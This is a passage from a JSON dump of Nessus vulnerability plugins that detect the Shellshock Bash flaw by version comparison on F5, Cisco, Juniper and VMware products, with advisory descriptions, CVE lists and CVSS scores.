make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = 
make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"11.6.0HF1\",\"11.5.2-11.5.3\",\"11.5.1HF5\",\"11.5.0HF5\",\"11.4.1HF5\",\"11.3.0HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF5\",\"11.4.0HF8\",\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = 
make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.3.0HF10\",\"11.2.1HF12\",\"10.2.4HF9\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "According to its self-reported version number, the version of Cisco TelePresence Video Communication Server is affected by a command injection vulnerability known as Shellshock in its included GNU Bash shell. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables.\nThis allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. 
The API over HTTP(S) and/or SSH can therefore be exploited.\n\nAn attacker must be authenticated before the system is exposed to this exploit.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "Cisco TelePresence Video Communication Server Bash Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_video_communication_server_software", "cpe:/a:cisco:telepresence_video_communication_server", "cpe:/h:cisco:telepresence_video_communication_server"], "id": "CISCO_TELEPRESENCE_VCS_CSCUR01461.NASL", "href": "https://www.tenable.com/plugins/nessus/78596", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78596);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01461\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco TelePresence Video Communication Server Bash Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco 
TelePresence Video Communication Server installed\non the remote host is affected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nTelePresence Video Communication Server is affected by a command\ninjection vulnerability known as Shellshock in its included GNU Bash\nshell. The vulnerability is due to the processing of trailing strings\nafter function definitions in the values of environment variables.\nThis allows a remote attacker to execute arbitrary code via\nenvironment variable manipulation depending on the configuration of\nthe system. The API over HTTP(S) and/or SSH can therefore be\nexploited.\n\nAn attacker must be authenticated before the system is exposed to this\nexploit.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur01461\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.2.4 / 8.1.2 / 8.2.2 / 8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n script_require_keys(\"Cisco/TelePresence_VCS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (\n version =~ \"^6\\.\" ||\n (version =~ \"^7\\.\" && ver_compare(ver:version, fix:\"7.2.4\", strict:FALSE) < 0) ||\n (version =~ \"^8\\.1\\.\" && ver_compare(ver:version, fix:\"8.1.2\", strict:FALSE) < 0) ||\n (version =~ \"^8\\.2\\.\" && ver_compare(ver:version, fix:\"8.2.2\", strict:FALSE) < 0)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 7.2.4 / 8.1.2 / 8.2.2 / 8.5' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:16", "description": "The remote ASA Next-Generation Firewall (NGFW) host is missing a security patch. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/h:cisco:adaptive_security_appliance"], "id": "CISCO-SA-CSCUR01959-ASA-CX.NASL", "href": "https://www.tenable.com/plugins/nessus/78827", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78827);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco ASA Next-Generation Firewall GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security device is missing a vendor-supplied security\npatch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 
remote ASA Next-Generation Firewall (NGFW) host is missing a\nsecurity patch. It is, therefore, affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20140926-bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:adaptive_security_appliance\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Cisco/ASA-CX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\nver = get_kb_item_or_exit('Host/Cisco/ASA-CX/Version');\nfix = '9.3.2.1(9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x below 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed release : ' + ver +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'ASA CX/NGFW', ver);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:17", "description": "According to its self-reported version, the CUCM IM and Presence Service installed on the remote host contains a version of GNU Bash that is affected by a command injection vulnerability known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "CUCM IM and Presence Service GNU Bash Environment Variable Handling Command Injection (CSCur05454) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO_CUPS_CSCUR05454.NASL", "href": "https://www.tenable.com/plugins/nessus/79124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79124);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05454\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CUCM IM and Presence Service GNU Bash Environment Variable Handling Command Injection (CSCur05454) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the CUCM IM and Presence\nService installed on the remote host contains a version of GNU Bash\nthat is affected by a command injection vulnerability known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur05454\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Unified Presence Server 10.5(1.12900.2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"cisco_unified_detect.nasl\");\n script_require_ports(\"Host/UCOS/Cisco Unified Presence/version\", \"cisco_cups/system_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Leverage API version first\ndisplay_version = get_kb_item(\"cisco_cups/system_version\");\n# Fall back to SSH\nif (isnull(display_version))\n{\n display_version = get_kb_item_or_exit('Host/UCOS/Cisco Unified Presence/version');\n match = eregmatch(string:display_version, pattern:'^([0-9.]+(?:-[0-9]+)?)($|[^0-9])');\n if (isnull(match)) audit(AUDIT_FN_FAIL, 'eregmatch');\n version = match[1];\n}\nelse version = display_version;\n\nversion = str_replace(string:version, find:\"-\", replace:\".\");\nfix = \"10.5.1.12900.2\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : 10.5.1.12900-2' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'CUCM IM and Presence Service', display_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:01:44", "description": "According to 
its self-reported version number, the remote Junos Space version is prior to 14.1R2, and may be affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10648.NASL", "href": "https://www.tenable.com/plugins/nessus/80196", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80196);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Junos Space\nversion is prior to 14.1R2, and may be affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space 14.1R2 or later or apply the relevant patch\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'14.1R2', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:56", "description": "The version of VMware vCenter Operations Manager installed on the remote host is prior to 5.7.3 / 5.8.3. 
It is, therefore, affected by the environmental variable command injection vulnerability known as 'Shellshock'.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-06T00:00:00", "type": "nessus", "title": "VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_operations"], "id": "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78889);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Operations Manager installed on the\nremote host is prior to 5.7.3 / 5.8.3. 
It is, therefore, affected by\nthe environmental variable command injection vulnerability known as\n'Shellshock'.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000272.html\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091083\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5e08f66\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d4f0ad92\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor supplied patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 